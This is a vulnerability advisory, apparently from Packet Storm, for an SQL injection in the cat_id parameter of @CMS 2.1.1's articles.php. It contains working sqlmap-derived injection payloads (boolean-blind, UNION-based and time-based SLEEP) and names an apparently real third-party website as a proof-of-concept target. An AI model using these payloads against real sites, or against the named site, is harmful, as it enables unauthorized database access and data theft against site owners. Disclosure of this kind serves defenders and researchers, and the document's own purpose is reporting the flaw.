@CMS 2.1.1 SQL Injection

2014-08-24T00:00:00
ID PACKETSTORM:127986
Type packetstorm
Reporter Renzi
Modified 2014-08-24T00:00:00

Description

                                        
                                            `# SQL Injection on @CMS 2.1.1 Stable  
  
# Risk: High  
  
# CWE number: CWE-89  
  
# Date: 22/08/2014  
  
# Vendor: www.atcode.net  
  
# Author: Felipe " Renzi " Gabriel  
  
# Contact: renzi@linuxmail.org  
  
# Tested on: Linux Mint  
  
# Vulnerable File: articles.php  
  
# Exploit: http://host/articles.php?cat_id=[SQLI]  
  
# PoC: http://carla-columna.de/articles.php?cat_id=[SQLI]  
  
  
--- "SQLi using sqlmap."---  
  
Place: GET  
Parameter: cat_id  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: cat_id=5' AND 6158=6158 AND 'SEMo'='SEMo  
  
Type: UNION query  
Title: MySQL UNION query (NULL) - 10 columns  
Payload: cat_id=5' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7163666971,0x6648715351716d446a54,0x71676e6371),NULL,NULL,NULL,NULL,NULL,NULL#  
  
Type: AND/OR time-based blind  
Title: MySQL > 5.0.11 AND time-based blind  
Payload: cat_id=5' AND SLEEP(5) AND 'XLrs'='XLrs  
---  
  
# Thank's  
  
  
  
  
  
  
`